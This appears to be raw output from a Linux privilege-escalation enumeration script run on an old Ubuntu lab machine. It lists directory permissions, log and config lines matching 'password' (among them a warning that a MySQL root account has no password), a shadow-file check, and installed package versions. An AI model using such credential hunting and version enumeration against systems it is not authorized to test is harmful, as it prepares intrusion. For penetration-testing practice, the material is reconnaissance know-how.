    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it.ISO8859-1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/X11R6
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/vi
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat8
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/opt
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/fsstnd
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat4
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat2
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/gl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl.ISO8859-2
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr.ISO8859-1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/nl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/oldlocal
    drwxrwsr-x 2 libuuid libuuid 4096 Mar 16  2010 /var/lib/libuuid
    drwx--s--- 2 postfix postdrop 4096 Sep 10 22:59 /var/spool/postfix/public
[+] Logs containing keyword 'password'
    /var/log/daemon.log:May  5 16:31:42 lame /etc/mysql/debian-start[5297]: WARNING: mysql.user contains 1 root accounts without password!
    /var/log/daemon.log:Sep 10 22:59:39 lame /etc/mysql/debian-start[4817]: WARNING: mysql.user contains 1 root accounts without password!
[+] Config files containing keyword 'password'
    /etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
    /etc/mysql/conf.d/old_passwords.cnf:old_passwords = false
    /etc/debconf.conf:# World-readable, and accepts everything but passwords.
    /etc/debconf.conf:Reject-Type: password
    /etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
    /etc/debconf.conf:Name: passwords
    /etc/debconf.conf:Accept-Type: password
    /etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
    /etc/debconf.conf:# databases, one to hold passwords and one for everything else.
    /etc/debconf.conf:Stack: config, passwords
    /etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
    /etc/samba/smb.conf:# You may wish to use password encryption.  See the section on
    /etc/samba/smb.conf:# 'encrypt passwords' in the smb.conf(5) manpage before enabling.
    /etc/samba/smb.conf:   encrypt passwords = true
    /etc/samba/smb.conf:# If you are using encrypted passwords, Samba will need to know what
    /etc/samba/smb.conf:# password database type you are using.
    /etc/samba/smb.conf:# password with the SMB password when the encrypted SMB password in the
    /etc/samba/smb.conf:;   unix password sync = no
    /etc/samba/smb.conf:# For Unix password sync to work on a Debian GNU/Linux system, the following
    /etc/samba/smb.conf:   passwd chat = *Enter\snew\sUNIX\spassword:* %n\n *Retype\snew\sUNIX\spassword:* %n\n .
    /etc/samba/smb.conf:# This boolean controls whether PAM will be used for password changes
    /etc/samba/smb.conf:;   pam password change = no
    /etc/ltrace.conf:; pwd.h
    /etc/proftpd/proftpd.conf:# Uncomment this if you are using NIS or LDAP via NSS to retrieve passwords:
    /etc/proftpd/proftpd.conf:# This is required to use both PAM-based authentication and local passwords
    /etc/proftpd/sql.conf:# Use both a crypted or plaintext password
    /etc/proftpd/sql.conf:# Use a backend-crypted or a crypted password
    /etc/proftpd/sql.conf:#SQLConnectInfo proftpd@sql.example.com proftpd_user proftpd_password
    /etc/proftpd/ldap.conf:#LDAPDNInfo "cn=admin,dc=example,dc=com" "admin_password"
    /etc/proftpd/ldap.conf:#LDAPDNInfo "cn=admin,dc=example,dc=com" "admin_password"
    /etc/hdparm.conf:# --security-set-pass Set security password
    /etc/hdparm.conf:# security_pass = password
    /etc/hdparm.conf:# --user-master Select password to use
    /etc/devscripts.conf:# options may be used to specify the username and password to use.
    /etc/devscripts.conf:# If only a username is provided then the password will be prompted for
    /etc/ssl/openssl.cnf:# input_password = secret
    /etc/ssl/openssl.cnf:# output_password = secret
    /etc/ssl/openssl.cnf:challengePassword		= A challenge password
    /etc/postgresql/8.3/main/postgresql.conf:#password_encryption = on
    /etc/cowpoke.conf:# using a simple password (or worse, a normal user password), then you can
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
    Status=Not/Installed/Config-f/Unpacked/Failed-cfg/Half-inst/t-aWait/T-pend
    Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
    Name Version
    adduser 3.105ubuntu1  and remove users and groups
    ant 1.7.0-3  based build tool like make
    antlr 2.7.6-10  tool for constructing recognizers,
    apache2 2.2.8-1  generation, scalable, extendable web se
    apache2-mpm-prefork 2.2.8-1ubuntu0.15  model for Apache HTTPD
    apache2-utils 2.2.8-1ubuntu0.15  programs for webservers
    apache2.2-common 2.2.8-1ubuntu0.15  generation, scalable, extendable web se
    apparmor 2.1+1075-0ubuntu9  parser utility for AppArmor
    apparmor-utils 2.1+1075-0ubuntu9  for controlling AppArmor
    apt 0.7.9ubuntu17  front-end for dpkg
    apt-utils 0.7.9ubuntu17  utility programs
    aptitude 0.4.9-2ubuntu5  package manager
    at 3.1.10ubuntu4  job execution and batch processing
    autoconf 2.61-4  configure script builder
    autoconf2.59 2.59-1  configure script builder (obsolete
    base-files 4.0.1ubuntu5  base system miscellaneous files
    base-passwd 3.5.16  base system master password and group
    bash 3.2-0ubuntu16  GNU Bourne Again SHell
    bash-completion 20060301-3ubuntu3  completion for the bash shell
    belocs-locales-bin 2.4-2.2ubuntu7  for compiling locale data files
    bind9 1:9.4.2-10  Domain Name Server
    bind9-host 1:9.4.2-10  of 'host' bundled with BIND 9.X
    binutils 2.18.1~cvs20080103-0ubuntu1  GNU assembler, linker and binary utiliti
    bsdmainutils 6.1.10ubuntu2  of more utilities from FreeBSD
    bsdutils 1:2.13.1-5ubuntu1  utilities from 4.4BSD-Lite
    busybox-initramfs 1:1.1.3-5ubuntu12  shell setup for initramfs
    bzip2 1.0.4-2ubuntu4  block-sorting file compressor -
    comerr-dev 2.1-1.40.8-2ubuntu2  error description library - headers a
    command-not-found 0.2.17ubuntu1  installation of packages in interact
    command-not-found-data 0.2.17ubuntu1  of data files for command-not-found.
    console-setup 1.21ubuntu8  up the font and the keyboard on the cons
    console-terminus 4.20-6  fonts for fast reading on the Li
    console-tools 1:0.2.3dbs-65ubuntu7  console and font utilities
    coreutils 6.10-3ubuntu2  GNU core utilities
    cpio 2.9-6ubuntu1  cpio -- a program to manage archives of
    cpp 4:4.2.3-1ubuntu6  GNU C preprocessor (cpp)
    cpp-4.2 4.2.4-1ubuntu4  GNU C preprocessor
    cron 3.0pl1-100ubuntu2  of regular background processing
    curl 7.18.0-1ubuntu2.3  a file from an HTTP, HTTPS or FTP server
    dash 0.5.4-8ubuntu1  shell
    debconf 1.5.20  configuration management system
    debconf-i18n 1.5.20  internationalization support for debcon
    debhelper 7.0.13ubuntu1~hardy1  programs for debian/rules
    debianutils 2.28.2-0ubuntu1  utilities specific to Debian
    defoma 0.11.10-0.2  Font Manager -- automatic font config
    devscripts 2.10.39ubuntu2~hardy1  to make the life of a Debian Package
    dhcp3-client 3.0.6.dfsg-1ubuntu9  client
    dhcp3-common 3.0.6.dfsg-1ubuntu9  files used by all the dhcp3* packages
    diff 2.8.1-12ubuntu1  comparison utilities
    diffstat 1.45-2  graph of changes introduced by a di
    distcc 2.18.3-4.1ubuntu1  distributed compiler client and serve
    dmidecode 2.9-1ubuntu1  Desktop Management Interface data
    dmsetup 2:1.02.20-2ubuntu2  Linux Kernel Device Mapper userspace lib
    dnsutils 1:9.4.2-10  provided with BIND
    dosfstools 2.11-2.3ubuntu1  to create and check MS-DOS FAT fil
    dpkg 1.14.16.6ubuntu3  maintenance system for Debian
    dpkg-dev 1.14.16.6ubuntu4.1  building tools for Debian
    e2fslibs 1.40.8-2ubuntu2  filesystem libraries
    e2fsprogs 1.40.8-2ubuntu2  file system utilities and libraries
    ecj 3.3.0+0728-5  version of the Eclipse Java compi
    ecj-gcj 3.3.0+0728-5  version of the Eclipse Java compi
    ed 0.7-1ubuntu1  classic unix line editor
    eject 2.1.5-6  CDs and operates CD-Changers under Li
    esound-common 0.2.38-0ubuntu9  Sound Daemon - Common files
    eterm 0.9.4.0debian1-2ubuntu3  Terminal Emulator
    ethtool 6-0  or change ethernet card settings
    fakeroot 1.9ubuntu1.1  a fake root environment
    fastjar 2:0.95-1ubuntu2  creation utility
    fdutils 5.5-20060227-1.1  floppy utilities
    figlet 2.2.2-1ubuntu1  Ian & Glenn's Letters
    file 4.21-3  file type using "magic" numbers
    filezilla 3.0.11.1-0ubuntu1~hardy1  of the famous Win32 graphical FTP clien
    filezilla-common 3.0.11.1-0ubuntu1~hardy1  independent files for filezilla
    findutils 4.2.32-1ubuntu2  for finding files--find, xargs
    firefox 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  and easy web browser from Mozilla
    firefox-3.0 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  upgrade package for firefox-3.0 -> fir
    firefox-branding 3.6.17+build3+nobinonly-0ubuntu0.8.04.1  that ships the firefox branding
    fluxbox 1.1.1-1~hardy1  configurable and low resource X11 Win
    fontconfig 2.5.0-2ubuntu3  font configuration library - support
    fontconfig-config 2.5.0-2ubuntu3  font configuration library - configu
    friendly-recovery 0.1  recovery more user-friendly
    ftp 0.17-16build1  FTP client
    ftpd 0.17-27  server
    fuse-utils 2.7.2-1ubuntu2  in USErspace (utilities)
    g++ 4:4.2.3-1ubuntu6  GNU C++ compiler
    g++-4.2 4.2.4-1ubuntu4  GNU C++ compiler
    gappletviewer-4.2 4.2.4-1ubuntu3  application to execute Java (tm)
    gcc 4:4.2.3-1ubuntu6  GNU C compiler
    gcc-4.2 4.2.4-1ubuntu4  GNU C compiler
    gcc-4.2-base 4.2.4-1ubuntu4  GNU Compiler Collection (base package)
    gcj-4.2 4.2.4-1ubuntu3  GNU compiler for Java(TM)
    gcj-4.2-base 4.2.4-1ubuntu3  GNU Compiler Collection (gcj base packag
    gconf2 2.22.0-0ubuntu3  configuration database system (support
    gconf2-common 2.22.0-0ubuntu3  configuration database system (common
    gdb 6.8-1ubuntu3  GNU Debugger
    gettext 0.17-2ubuntu1  Internationalization utilities
    gettext-base 0.17-2ubuntu1  Internationalization utilities for the b
    gij 4:4.2.3-1ubuntu6  GNU Java bytecode interpreter
    gij-4.2 4.2.4-1ubuntu3  GNU Java bytecode interpreter
    gjdoc 0.7.8-6  generation framework for java
    gnupg 1.4.6-2ubuntu5  privacy guard - a free PGP replacement
    gpgv 1.4.6-2ubuntu5  privacy guard - signature verification t
    grep 2.5.3~dfsg-3  grep, egrep and fgrep
    groff-base 1.18.1.1-16  troff text-formatting system (base syste
    grub 0.97-29ubuntu21.2  Unified Bootloader
    gzip 1.3.12-3.2  GNU compression utility
    hdparm 8.6-1ubuntu1  hard disk parameters for high performan
    hostname 2.94  to set/show the host name or domain
    html2text 1.3.2a-3build2  advanced HTML to text converter
    ifupdown 0.6.8ubuntu8  level tools to configure network interf
    info 4.11.dfsg.1-4  GNU Info documentation browser
    initramfs-tools 0.85eubuntu36  for generating an initramfs
    initscripts 2.86.ds1-14.1ubuntu45  for initializing and shutting down t
    inputattach 1.23-0ubuntu2  to attach serial devices to the inpu
    installation-report 2.31ubuntu1  installation report
    intltool-debian 0.35.0+20060710.1  i18n of RFC822 compliant config files
    iproute 20071016-2ubuntu1  tools to control the networking
    iptables 1.3.8.0debian1-1ubuntu2  tools for packet filtering an
    iputils-arping 3:20071127-1  to send ICMP echo requests to an ARP ad
    iputils-ping 3:20071127-1  to test the reachability of network ho
    iputils-tracepath 3:20071127-1  to trace the network path to a remote
    java-common 0.28ubuntu3  of all Java packages
    java-gcj-compat 1.0.77-2ubuntu2  runtime environment using GIJ
    java-gcj-compat-dev 1.0.77-2ubuntu2  runtime environment with GCJ
    java-gcj-compat-headless 1.0.77-2ubuntu2  runtime environment using GIJ (headless
    jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    klibc-utils 1.5.7-4ubuntu3  statically-linked utilities built with
    klogd 1.5-1ubuntu1  Logging Daemon
    laptop-detect 0.13.2ubuntu1  to detect a laptop
    less 418-1  program similar to more
    libacl1 2.2.45-1  control list shared library
    libapache2-mod-php5 5.2.4-2ubuntu5.24  HTML-embedded scripting languag
    libapr1 1.2.11-1  Apache Portable Runtime Library
    libaprutil1 1.2.12+dfsg-3  Apache Portable Runtime Utility Library
    libasound2 1.0.15-3ubuntu4  library
    libaspell15 0.60.5-1ubuntu2  Aspell spell-checker runtime library
    libast2 0.7-2  Library of Assorted Spiffy Things
    libatk1.0-0 1.22.0-0ubuntu1  ATK accessibility toolkit
    libatm1 2.4.1-17.1build1  library for ATM (Asynchronous Transfe
    libattr1 1:2.4.39-1  attribute shared library
    libaudiofile0 0.2.6-7ubuntu1.8.04.1  version of SGI's audiofile libra
    libavahi-client3 0.6.22-2ubuntu4.3  client library
    libavahi-common-data 0.6.22-2ubuntu4.3  common data files
    libavahi-common3 0.6.22-2ubuntu4.3  common library
    libavahi-glib1 0.6.22-2ubuntu4.3  glib integration library
    libbcel-java 5.2-3ubuntu1  create, and manipulate (binary) Jav
    libbind9-30 1:9.4.2-10  Shared Library used by BIND
    libblkid1 1.40.8-2ubuntu2  device id library
    libbz2-1.0 1.0.4-2ubuntu4  block-sorting file compressor l
    libc6 2.7-10ubuntu5  C Library: Shared libraries
    libc6-dev 2.7-10ubuntu5  C Library: Development Libraries and Hea
    libc6-i686 2.7-10ubuntu5  C Library: Shared libraries [i686 optimi
    libcairo2 1.6.0-0ubuntu2  Cairo 2D vector graphics library
    libcap1 1:1.10-14build1  for getting/setting POSIX.1e capabil
    libchromexvmc1 1:0.2.901-0ubuntu4  Libraries used by the Openchrome VIA dr
    libchromexvmcpro1 1:0.2.901-0ubuntu4  Pro Libraries used by the Openchrome VI
    libck-connector0 0.2.3-3ubuntu5  libraries
    libcomerr2 1.40.8-2ubuntu2  error description library
    libcommons-beanutils-java 1.8.0~beta-1  for manipulating JavaBeans
    libcommons-collections-java 2.1.1-8  set of abstract data type interfaces and i
    libcommons-collections3-java 3.1a-3.1  set of abstract data type interfaces and i
    libcommons-daemon-java 1.0.2~svn20061127-6  to launch Java applications as daemo
    libcommons-dbcp-java 1.2.2-1  Connection Pooling Services
    libcommons-digester-java 1.8-1  based XML Java object mapping tool
    libcommons-el-java 1.0-4  of the JSP2.0 Expression Lang
    libcommons-fileupload-java 1.2-2  upload capability to your servlets and
    libcommons-io-java 1.3.2-2  useful IO related classes
    libcommons-launcher-java 1.1-3  platform java application launcher
    libcommons-logging-java 1.1-1ubuntu1  wrapper interface for several loggin
    libcommons-modeler-java 2.0.1-4  library to use Java Management E
    libcommons-pool-java 1.3-1  implementation for Java objects
    libcommons-validator-java 1:1.3.1-1  and speed development and maintenance o
    libconsole 1:0.2.3dbs-65ubuntu7  libraries for Linux console and font
    libcupsys2 1.3.7-1ubuntu3.9  UNIX Printing System(tm) - libs
    libcurl3 7.18.0-1ubuntu2.3  file transfer library (OpenSS
    libcurl3-gnutls 7.18.0-1ubuntu2  file transfer library (GnuTLS
    libcurl4-openssl-dev 7.18.0-1ubuntu2.3  files and documentation for libc
    libcwidget3 0.5.8-1ubuntu1  terminal interface library for C+
    libdatrie0 0.1.2-2  trie library
    libdb4.6 4.6.21-6ubuntu1  v4.6 Database Libraries [runtime]
    libdbd-mysql-perl 4.005-1  Perl5 database interface to the MySQL data
    libdbi-perl 1.601-1  database interface by Tim Bunce
    libdbus-1-3 1.1.20-1ubuntu1  interprocess messaging system
    libdbus-glib-1-2 0.74-2ubuntu0.1  interprocess messaging system (GLib-b
    libdevmapper1.02.1 2:1.02.20-2ubuntu2  Linux Kernel Device Mapper userspace lib
    libdns32 1:9.4.2-10  Shared Library used by BIND
    libdrm2 2.3.0-4ubuntu1  interface to kernel DRM services -
    libecj-java 3.3.0+0728-5  Java compiler (library)
    libecj-java-gcj 3.3.0+0728-5  Java compiler (native library)
    libedit2 2.9.cvs.20050518-4  editline and history libraries
    libelfg0 0.8.6-4  ELF object file access library
    libesd-alsa0 0.2.38-0ubuntu9  Sound Daemon (ALSA) - Shared lib
    libevent1 1.3e-1  asynchronous event notification library
    libexpat1 2.0.1-0ubuntu1  parsing C library - runtime library
    libfontconfig1 2.5.0-2ubuntu3  font configuration library - runtime
    libfontenc1 1:1.0.4-2  font encoding library
    libfreetype6 2.3.5-1ubuntu4.8.04.2  2 font engine, shared library files
    libfribidi0 0.10.9-1  Implementation of the Unicode BiDi algo
    libfs6 2:1.0.0-4ubuntu2  Font Services library
    libfuse2 2.7.2-1ubuntu2  in USErspace library
    libgadu3 1:1.7~rc2-2ubuntu0.8.04.1  protocol library - runtime files
    libgc1c2 1:6.8-1.1  garbage collector for C and C++
    libgcc1 1:4.2.4-1ubuntu4  support library
    libgcj-bc 4.2.3-1ubuntu6  time only library for use with gcj
    libgcj-common 1:4.2.3-1ubuntu6  runtime library (common files)
    libgcj8-1 4.2.4-1ubuntu3  runtime library for use with gcj
    libgcj8-1-awt 4.2.4-1ubuntu3  peer runtime libraries for use with gcj
    libgcj8-dev 4.2.4-1ubuntu3  development headers for use with gcj
    libgcj8-jar 4.2.4-1ubuntu3  runtime library for use with gcj (jar f
    libgconf2-4 2.22.0-0ubuntu3  configuration database system (shared
    libgcrypt11 1.2.4-2ubuntu7  Crypto library - runtime library
    libgd2-xpm 2.0.35.dfsg-3ubuntu2.1  Graphics Library version 2
    libgdbm3 1.8.3-3  dbm database routines (runtime version)
    libgif4 4.1.6-4  for GIF images (library)
    libgl1-mesa-glx 7.0.3~rc2-1ubuntu3  free implementation of the OpenGL API -- G
    libglib2.0-0 2.16.6-0ubuntu1.2  GLib library of C routines
    libglu1-mesa 7.0.3~rc2-1ubuntu3  OpenGL utility library (GLU)
    libgnutls13 2.0.4-1ubuntu2  GNU TLS library - runtime library
    libgomp1 4.2.4-1ubuntu4  OpenMP (GOMP) support library
    libgpg-error0 1.4-2ubuntu7  for common error values and messages
    libgpmg1 1.19.6-25ubuntu1  Purpose Mouse - shared library
    libgssglue1 0.1-1  gssapi library
    libgstreamer-plugins-base0.10-0 0.10.18-3  libraries from the "base" set
    libgstreamer0.10-0 0.10.18-4ubuntu2  GStreamer libraries and elements
    libgtk2.0-0 2.12.9-3ubuntu5  GTK+ graphical user interface library
    libgtk2.0-common 2.12.9-3ubuntu5  files for the GTK+ graphical user int
    libgtkspell0 2.0.10-4  spell-checking addon for GTK's TextView wi
    libhal1 0.5.11~rc2-1ubuntu8.3  Abstraction Layer - shared library
    libhesiod0 3.0.2-18.1  for hesiod, a service name resolut
    libhtml-parser-perl 3.56-1  collection of modules that parse HTML text
    libhtml-tagset-perl 3.10-2  tables pertaining to HTML
    libhtml-tree-perl 3.23-1  and create HTML syntax trees
    libice6 2:1.0.4-1  Inter-Client Exchange library
    libid3tag0 0.15.1b-10  tag reading library from the MAD project
    libidl0 0.8.10-0.1  for parsing CORBA IDL files
    libidn11 1.1-1  libidn library, implementation of IETF I
    libidn11-dev 1.1-1  files GNU libidn, implementation
    libimlib2 1.4.0-1ubuntu1.2  image loading and rendering library
    libisc32 1:9.4.2-10  Shared Library used by BIND
    libisccc30 1:9.4.2-10  Channel Library used by BIND
    libisccfg30 1:9.4.2-10  File Handling Library used by BIND
    libiw29 29-1ubuntu2  tools - library
    libjaxp1.3-java 1.3.04-2  XML parser and transformer APIs (DOM, S
    libjpeg62 6b-14  Independent JPEG Group's JPEG runtime li
    libkadm55 1.6.dfsg.3~beta1-2ubuntu1.8  Kerberos administration runtime librarie
    libkeyutils1 1.2-4  Key Management Utilities (library)
    libklibc 1.5.7-4ubuntu3  libc subset for use with initramfs
    libkrb5-dev 1.6.dfsg.3~beta1-2ubuntu1.8  and development libraries for MIT Ke
    libkrb53 1.6.dfsg.3~beta1-2ubuntu1.8  Kerberos runtime libraries
    liblaunchpad-integration1 0.1.19  for launchpad integration
    libldap-2.4-2 2.4.9-0ubuntu0.8.04.3  libraries
    libldap2-dev 2.4.9-0ubuntu0.8.04.3  development libraries
    liblocale-gettext-perl 1.05-2ubuntu1  libc functions for internationalizatio
    liblog4j1.2-java 1.2.15-2  library for java
    liblwres30 1:9.4.2-10  Resolver Library used by BIND
    liblzo2-2 2.02-3  compression library
    libmagic1 4.21-3  type determination library using "magic
    libmeanwhile1 1.0.2-3  implementation of the Lotus Sametime Co
    libmx4j-java 3.0.1-3  open source implementation of the JMX(TM)
    libmysqlclient15off 5.0.51a-3ubuntu5  database client library
    libncurses5 5.6+20071124-1ubuntu2  libraries for terminal handling
    libncursesw5 5.6+20071124-1ubuntu2  libraries for terminal handling (wide
    libnet-daemon-perl 0.38-1.1  module for building portable Perl daemo
    libnewt0.52 0.52.2-11.2ubuntu1  Erik's Windowing Toolkit - text mode win
    libnfsidmap2 0.20-0build1  nfs idmapping library
    libnspr4-0d 4.8.6-0ubuntu0.8.04.1  Portable Runtime Library
    libnss3-1d 3.12.9+ckbi-1.82-0ubuntu0.8.04.1  Security Service libraries
    libntfs-3g23 1:1.2216-1ubuntu1  filesystem in userspace (FUSE) libra
    libopencdk10 0.6.6-1ubuntu1  Crypto Development Kit (OpenCDK) (runti
    liborbit2 1:2.14.12-0.1  for ORBit2 - a CORBA ORB
    liboro-java 2.0.8a-3  expression library for Java
    libpam-modules 0.99.7.1-5ubuntu6  Authentication Modules for PAM
    libpam-runtime 0.99.7.1-5ubuntu6  support for the PAM library
    libpam0g 0.99.7.1-5ubuntu6.1  Authentication Modules library
    libpam0g-dev 0.99.7.1-5ubuntu6.1  files for PAM
    libpango1.0-0 1.20.5-0ubuntu1.1  and rendering of internationalized te
    libpango1.0-common 1.20.5-0ubuntu1.1  and configuration files for the Pang
    libparted1.7-1 1.7.1-5.1ubuntu9  GNU Parted disk partitioning shared libr
    libpcap0.8 0.9.8-2  interface for user-level packet captu
    libpcre3 7.4-1ubuntu2  5 Compatible Regular Expression Library
    libperl5.8 5.8.8-12ubuntu0.5  Perl library
    libpixman-1-0 0.10.0-0ubuntu1  library for X and cairo
    libplrpc-perl 0.2017-1.1  extensions for writing PlRPC servers an
    libpng12-0 1.2.15~beta5-3ubuntu0.2  library - runtime
    libpopt-dev 1.10-3build1  for parsing cmdline parameters - develop
    libpopt0 1.10-3build1  for parsing cmdline parameters
    libpq5 8.3.1-1  C client library
    libpurple0 1:2.5.2-0ubuntu1.2~hardy1  instant messaging library
    libreadline5 5.2-3build1  readline and history libraries, run-time
    libregexp-java 1.4-4  expression library for Java
    librpc-xml-perl 0.59-2  module implementation of XML-RPC
    librpcsecgss3 0.17-1ubuntu2  secure rpc communication using the rp
    libruby1.8 1.8.6.111-2ubuntu1.3  necessary to run Ruby 1.8
    libsasl2-2 2.1.22.dfsg1-18ubuntu2  SASL - authentication abstraction libr
    libsasl2-modules 2.1.22.dfsg1-18ubuntu2  SASL - pluggable authentication module
    libselinux1 2.0.55-0ubuntu4  policy enforcement, run-time librari
    libsensors3 1:2.10.5-3ubuntu1  to read temperature/voltage/fan sens
    libsepol1 2.0.20-0ubuntu3  binary policy, run-time library
    libservlet2.3-java 4.0-10  2.3 and JSP 1.2 Java classes and doc
    libservlet2.4-java 5.0.30-6ubuntu1  2.4 and JSP 2.0 Java library.
    libsigc++-2.0-0c2a 2.0.17-2ubuntu3  Signal Framework for C++ - runtime
    libsilc-1.1-2 1.1.5-1ubuntu1  library (silc-toolkit)
    libslang2 2.1.3-2  S-Lang programming library - runtime ver
    libsm6 2:1.0.3-1  Session Management library
    libsnmp-base 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) MI
    libsnmp15 5.4.1~dfsg-4ubuntu4.3  (Simple Network Management Protocol) li
    libsqlite3-0 3.4.2-2  3 shared library
    libss2 1.40.8-2ubuntu2  interface parsing library
    libssl-dev 0.9.8g-4ubuntu3.18  development libraries, header files and
    libssl0.9.8 0.9.8g-4ubuntu3.18  shared libraries
    libstartup-notification0 0.9-1  for program launch feedback (shared
    libstdc++6 4.2.4-1ubuntu4  GNU Standard C++ Library v3
    libstdc++6-4.2-dev 4.2.4-1ubuntu4  GNU Standard C++ Library v3 (development
    libstruts1.2-java 1.2.9-3  Framework for MVC web applications
    libsysfs2 2.1.0-4  library to sysfs
    libt1-5 5.1.1-5  1 font rasterizer library - runtime
    libtasn1-3 1.1-1  ASN.1 structures (runtime)
    libterm-readkey-perl 2.30-3ubuntu1  perl module for simple terminal control
    libtext-charwidth-perl 0.04-4build1  display widths of characters on the term
    libtext-iconv-perl 1.4-3  between character sets in Perl
    libtext-wrapi18n-perl 0.06-5  substitute of Text::Wrap
    libthai-data 0.1.9-1ubuntu0.2  files for Thai language support library
    libthai0 0.1.9-1ubuntu0.2  language support library
    libtiff4 3.8.2-7ubuntu3.4  Image File Format (TIFF) library
    libtimedate-perl 1.1600-9  and date functions for Perl
    libtomcat5.5-java 5.5.25-5ubuntu1.2  Servlet engine -- core libraries
    liburi-perl 1.35.dfsg.1-1  and accesses URI strings
    libusb-0.1-4 2:0.1.12-8  USB programming library
    libuuid1 1.40.8-2ubuntu2  unique id library
    libvolume-id0 117-8  identification library
    libwrap0 7.6.dbs-14  Venema's TCP wrappers library
    libwww-perl 5.808-1  client/server library for Perl (aka LWP)
    libwxbase2.8-0 2.8.7.1-0ubuntu3  library (runtime) - non-GUI support c
    libwxgtk2.8-0 2.8.7.1-0ubuntu3  Cross-platform C++ GUI toolkit (GT
    libx11-6 2:1.1.3-1ubuntu2  client-side library
    libx11-data 2:1.1.3-1ubuntu2  client-side library
    libxau6 1:1.0.3-2  authorisation library
    libxaw7 2:1.0.4-1  Athena Widget library
    libxcb-xlib0 1.1-1ubuntu1  C Binding, Xlib/XCB interface library
    libxcb1 1.1-1ubuntu1  C Binding
    libxcomposite1 1:0.4.0-1  Composite extension library
    libxcursor1 1:1.1.9-1  cursor management library
    libxdamage1 1:1.1.1-3  damaged region extension library
    libxdmcp6 1:1.0.2-2  Display Manager Control Protocol library
    libxerces2-java 2.9.0-1  XML parser for Java with DOM leve
    libxext6 2:1.0.3-2build1  miscellaneous extension library
    libxfixes3 1:4.0.3-2  miscellaneous 'fixes' extension library
    libxfont1 1:1.3.1-2  font rasterisation library
    libxft2 2.1.12-2ubuntu5  font drawing library for X
    libxi6 2:1.1.3-1  Input extension library
    libxinerama1 2:1.0.2-1build1  Xinerama extension library
    libxkbfile1 1:1.0.4-1  keyboard file manipulation library
    libxml-parser-perl 2.34-4.3  module for parsing XML files
    libxml2 2.6.31.dfsg-2ubuntu1  XML library
    libxmu6 2:1.0.4-1  miscellaneous utility library
    libxmuu1 2:1.0.4-1  miscellaneous micro-utility library
    libxpm4 1:3.5.7-1  pixmap library
    libxrandr2 2:1.2.2-1  RandR extension library
    libxrender1 1:0.9.4-1  Rendering Extension client library
    libxss1 1:1.1.2-1  Screen Saver extension library
    libxt6 1:1.0.5-3  toolkit intrinsics library
    libxtrap6 2:1.0.0-4build1  event trapping extension library
    libxtst6 2:1.0.3-1  Testing -- Resource extension library
    libxv1 2:1.0.3-1ubuntu1  Video extension library
    libxxf86dga1 2:1.0.2-1  Direct Graphics Access extension library
    libxxf86misc1 1:1.0.1-2  XFree86 miscellaneous extension library
    libxxf86vm1 1:1.0.1-2  XFree86 video mode extension library
    libzephyr3 2.1.20070719.SNAPSHOT-1  original "Instant Message" system librar
    linux-image-2.6.24-16-server 2.6.24-16.30  kernel image for version 2.6.24 on x86
    linux-image-server 2.6.24.16.18  kernel image on Server Equipment.
    linux-libc-dev 2.6.24-27.68  Kernel Headers for development
    linux-server 2.6.24.16.18  Linux kernel on Server Equipment.
    linux-ubuntu-modules-2.6.24-16-server 2.6.24-16.23  supplied Linux modules for version 2.
    locales 2.7.9-4  files for locale support
    login 1:4.0.18.2-1ubuntu2  login tools
    logrotate 3.7.1-3  rotation utility
    lsb-base 3.2-4ubuntu1  Standard Base 3.2 init script function
    lsb-release 3.2-4ubuntu1  Standard Base version reporting utilit
    lshw 02.12.01-2ubuntu1  about hardware configuration
    lsof 4.78.dfsg.1-3  open files
    ltrace 0.5-3ubuntu1  runtime library calls in dynamically
    lvm2 2.02.26-1ubuntu9  Linux Logical Volume Manager
    lzma 4.43-12ubuntu1  method of 7z format in 7-Zip pro
    m4 1.4.10-1  macro processing language
    make 3.81-3build1  GNU version of the "make" utility.
    makedev 2.3.1-84ubuntu1  device files in /dev
    man-db 2.5.1-3  manual pager
    manpages 2.77-1  pages about using a GNU/Linux system
    mawk 1.3.3-11ubuntu2  pattern scanning and text processing langu
    mdetect 0.5.2.1ubuntu4  device autodetection tool
    memtest86+ 1.70-3ubuntu1  real-mode memory tester
    menu 2.1.38ubuntu2  programs menu for all menu-aware a
    mii-diag 2.11-2  little tool to manipulate network cards
    mime-support 3.39-1ubuntu1  files 'mime.types' & 'mailcap', and sup
    mktemp 1.5-5ubuntu2  unique filenames for temporary files
    mlocate 0.18-2ubuntu1  find files on the filesystem based o
    module-init-tools 3.3-pre11-4ubuntu5  for managing Linux kernel modules
    mount 2.13.1-5ubuntu1  for mounting and manipulating filesyst
    mtr-tiny 0.72-2ubuntu1  screen ncurses traceroute tool
    mysql-client-5.0 5.0.51a-3ubuntu5  database client binaries
    mysql-common 5.0.51a-3ubuntu5  database common files
    mysql-server 5.0.51a-3ubuntu5  database server (meta package dependin
    mysql-server-5.0 5.0.51a-3ubuntu5  database server binaries
